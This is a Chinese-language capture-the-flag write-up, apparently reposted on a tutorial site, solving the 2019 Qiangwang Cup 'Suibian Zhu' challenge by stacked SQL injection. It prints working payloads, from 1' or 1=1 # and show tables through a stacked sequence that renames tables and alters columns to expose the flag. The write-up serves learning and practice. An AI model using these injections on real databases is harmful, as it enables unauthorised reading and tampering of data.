堆叠注入-[强网杯 2019]随便注

本文主要是介绍堆叠注入-[强网杯 2019]随便注，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

 输入1进去，发现可以正常输出；

在身上1';发现不能进行正常回显。

 试了一下 1' or 1=1 #发现有正常回显；

 再进行查询表；

1';show tables;

 发现有两个表，只有一个一个的试，没有十分明显的标志；
1';show columns from `1919810931114514`;#

 第一次试 1919810931114514这个表就发现了flag；

但在查这个数字表名试一定要加反引号``，在这个地方卡了好久。。；

继续查找flag；发现我无法直接查出flag的值；

又去查了一下words的内容

 没有找到有用信息；就搜了一下wp，发现还要改表名；只有去改表名；

1';rename table words to word1;rename table `1919810931114514` to words;
alter table words add id int unsigned not null auto_increment primary key;
alter table words change flag data varchar(100);#

将flag的列改为id，以便直接查询；

 还是回到了原来的样子；

再用1' or 1=1;# 进行查询；得到flag。

 总结：这个主要利用了sql的叠堆注入；过滤了太多的关键字，无法直接进行查询。

Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。每一条语句的结束用;(分号)隔开；主要是要用到改表名；

这篇关于堆叠注入-[强网杯 2019]随便注的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！